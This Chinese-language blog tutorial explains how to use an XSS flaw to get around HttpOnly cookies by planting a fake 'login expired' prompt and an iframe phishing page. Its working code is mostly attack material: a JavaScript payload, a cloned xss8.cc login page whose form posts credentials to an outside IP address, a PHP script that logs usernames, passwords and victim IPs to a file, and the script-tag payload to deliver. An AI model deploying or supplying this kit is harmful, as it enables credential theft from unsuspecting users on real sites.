内嵌IFrame绕过httponly获取cookie

前言

之前项目遇到httponly的情况，总结后发现对于xss遇到httponly如何继续利用了解手段不够多。从同事那里听说了这种技巧于是就决定总结一下此种用法。

思路

我们通过xss键嵌入一段脚本，该脚本的作用为提示登录过期，需要重新登录，并将伪造的登录页面通过iframe加载到受害者的浏览器中。在受害者通过我们伪造的登录框输入密码后，伪造的登录框将账号密码传到我们的服务器上并保存。

实战利用

首先新建一个js文件，该js文件作用为提示重新登录，在ifame中嵌套伪造的登录页面。

1.js

setTimeout(function(){
alert("登陆过期，请重新登陆！");
parent.document.writeln("<iframe style=\"margin:0px;padding:0px;height:100%;width:100%;\" src=\"http:\/\/你的域名/1.html\" frameBorder=0 scrolling=no></iframe>");
setTimeout(function(){
document.getElementsByTagName("body")[0].setAttribute("style","margin:2px;");},100);
setTimeout(function(){
parent.document.getElementsByTagName("body")[0].setAttribute("style","margin:0px;");},100);
},1500);

再新建一个html文件，该html文件的作用为伪造目标的登录页面，这里以https://xss8.cc/login/为例，右键查看源码，然后复制源码并将其中的相对路径都替换成绝对路径。

1.html

<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>         <html class="lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>         <html class="lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html> <!--<![endif]-->
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1">
  <meta name="renderer" content="webkit">
  <meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
<title>XSS平台-XSS安全测试平台</title>
 <meta name="keywords" content="xss平台,xss代码,xss教程,xss平台邀请码,免费xss平台,xss测试平台" />
 <meta name="description" content="xss8.cc提供在线xss平台，仅用于程序员测试xss攻击，切勿用于非法用途。" />
  <link href="https://xss8.cc/themes/default/image/bootstrap.css?6.16.3" rel="stylesheet" />
  <link rel="stylesheet" media="screen" href="https://xss8.cc/themes/default/image/main.css?6.16.3" />
 <link type="text/css" rel="stylesheet" href="https://xss8.cc/news/style.css">
</head>
<body >

  <div class="es-wrap">
    <div class="navbar navbar-inverse site-navbar" id="site-navbar"  data-counter-url="/user_remind_counter">
    <div class="container">
      <div class="container-gap">
        <div class="navbar-collapse collapse">
          <ul class="nav navbar-nav">
      </ul>
          <ul class="nav navbar-nav">
                <li class="">
 <li class="active"><a href="https://xss8.cc">xss平台主页</a></li>
            <li><a href="https://xss8.cc/">平台支持https</a></li><li><a href="https://xss8.cc/news/">XSS平台新闻</a></li><li><a href="https://www.xssye.com/?xss8cc">XSSYE</a></li>
              </li>
                    <li class="">
        <a href="https://xss8.cc//shang.qq.com/wpa/qunwpa?idkey=843c1367c3df71ffb306675e0bb2af1d04f21633bc445978e19ce6660d521db0"   target="_blank"  title="xss平台"  >xss平台QQ交流群 </a>
              </li>
      </ul>

          <ul class="nav navbar-nav navbar-right">
<!--                 <li>
                <form class="navbar-form navbar-right hidden-xs" action="/search" method="get">
                  <div class="form-group">
                    <input class="form-control js-search" name="q" placeholder="搜索">
                    <button class="button es-icon es-icon-search"></button>
                  </div>
                </form>
               </li> -->
              <li><a href="https://xss8.cc/login/">xss平台登录</a></li>
              <li><a href="https://xss8.cc/register/">注册</a></li>
                      </ul>
        </div><!--/.navbar-collapse -->
      </div>
    </div>
  </div>        
                
      <div id="content-container" class="container">
        <div class="es-section login-section">
  <div class="logon-tab clearfix">
    <a class="active">xss平台登录</a>
    <a href="https://xss8.cc/register/">注册</a>
  </div>
  <div class="login-main">
    <form class="form-vertical" method="post" action="http://47.98.239.204/1.php">

              
      <div class="form-group mbl">
        <label class="control-label" for="login_username">帐号</label>
        <div class="controls">
          <input class="form-control input-lg" id="login_username" type="text" name="user" value="" required placeholder='用户名' />
          <div class="help-block"></div>
        </div>
      </div>
      <div class="form-group mbl">
        <label class="control-label" for="login_password">密码</label>
        <div class="controls">
          <input class="form-control input-lg" id="login_password" type="password" name="pwd" required placeholder='密码'/>
        </div>
      </div>


      <div class="form-group mbl">
        <button type="submit" class="btn btn-primary btn-lg btn-block">登录</button>
      </div>
    </form>

    <div class="mbl">
      <a href="https://xss8.cc/register-zh/">找回密码</a>
      <span class="text-muted mhs">|</span>
      <span class="text-muted">还没有注册帐号？</span>
      <a href="https://xss8.cc/register/">立即注册</a>
    </div>

      </div>
</div>

      </div>
      
              
          <div class="site-footer container clearfix">

    <ul class="site-footer-links">
	</ul>

    <div class="text-gray" data-role="default-foot-bar">
      
      <div class="pull-right"> ©2018-2020 xss平台开放注册，仅用于授权安全测试，请勿非法使用！ </div>
<script type="text/javascript" src="https://js.users.51.la/19592179.js"></script>
    </div>
  </div>    
      </div>
<script type="text/javascript" color="26,156,124" opacity='0.6' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.1/canvas-nest.min.js"></script>
<div class="fav_list" style="margin-top:0px">
    <div data-v-357a65ed="" class="fav_list_box">
        <div  class="fav_list_title">
            <h3 class="fav_list_title_h3">新闻列表</h3>
           
        </div>
        <div  class="my_fav_con">
            <div>
                <ul  class="my_fav_list">
                                         <li class="my_fav_list_li" id="">
                        <a  class="my_fav_list_a" href="https://xss8.cc/news/detail.php?id=22" target="_blank">
                            cookiehacker-cookie注入插件                        </a>
                        <label class="my_fav_list_label">
                            <span >2021-01-05</span>
                        </label>
                    </li>
                   
                  	                     <li class="my_fav_list_li" id="">
                        <a  class="my_fav_list_a" href="https://xss8.cc/news/detail.php?id=21" target="_blank">
                            指定多URL地址提交数据(post)                        </a>
                        <label class="my_fav_list_label">
                            <span >2020-12-02</span>
                        </label>
                    </li>
                   
                  	                     <li class="my_fav_list_li" id="">
                        <a  class="my_fav_list_a" href="https://xss8.cc/news/detail.php?id=20" target="_blank">
                            XSS爬虫→(神器〔七伤拳〕)                        </a>
                        <label class="my_fav_list_label">
                            <span >2020-11-27</span>
                        </label>
                    </li>
                   
                  	                     <li class="my_fav_list_li" id="">
                        <a  class="my_fav_list_a" href="https://xss8.cc/news/detail.php?id=16" target="_blank">
                            xss平台赞助会员及普通会员说明                        </a>
                        <label class="my_fav_list_label">
                            <span >2020-11-23</span>
                        </label>
                    </li>
                   
                  	                     <li class="my_fav_list_li" id="">
                        <a  class="my_fav_list_a" href="https://xss8.cc/news/detail.php?id=15" target="_blank">
                            超强默认模块使用说明                        </a>
                        <label class="my_fav_list_label">
                            <span >2020-11-22</span>
                        </label>
                    </li>
                   
                  	                     <li class="my_fav_list_li" id="">
                        <a  class="my_fav_list_a" href="https://xss8.cc/news/detail.php?id=14" target="_blank">
                            删号通知                        </a>
                        <label class="my_fav_list_label">
                            <span >2020-11-20</span>
                        </label>
                    </li>
                   
                  	                     <li class="my_fav_list_li" id="">
                        <a  class="my_fav_list_a" href="https://xss8.cc/news/detail.php?id=12" target="_blank">
                            xss平台更新公告                        </a>
                        <label class="my_fav_list_label">
                            <span >2020-11-18</span>
                        </label>
                    </li>
                   
                  	                     <li class="my_fav_list_li" id="">
                        <a  class="my_fav_list_a" href="https://xss8.cc/news/detail.php?id=1" target="_blank">
                            xss平台免责申明                        </a>
                        <label class="my_fav_list_label">
                            <span >2020-11-18</span>
                        </label>
                    </li>
                   
                  	                 </ul> 
            </div>
        </div>
    </div>
</body>
</html>

需要注意的是，action这里需要指向我们自己服务器上的处理文件，1.php作用为保存发送过来的账号密码并以文件形式存储。

下面创建1.php，这里需要注意，在1.php中的获取的字段name需要和form表单中的字段name保持一致，我这里是user和pwd字段。

<?php 
$str=''; 
$str.='name:'.$_POST['user'].'|'; 
$str.='pwd:'.$_POST['pwd'].'|'; 
$str.='ip:'.$_SERVER["REMOTE_ADDR"].'|'; 
$str.='time:'.date("m-d-h:i");
echo $str; 
file_put_contents('./log.txt',$str.PHP_EOL, FILE_APPEND); 
#下面这行的意思是记录完账号密码以后跳转到他原来的后台地址。
header("location:https://xss8.cc/");
?> 

最后我们只需要把<script\ src=”http://xxx.xxx.xxx.xxx/1.js"%3E这个payload通过xss发送给对方即可。

赏

谢谢你请我吃糖果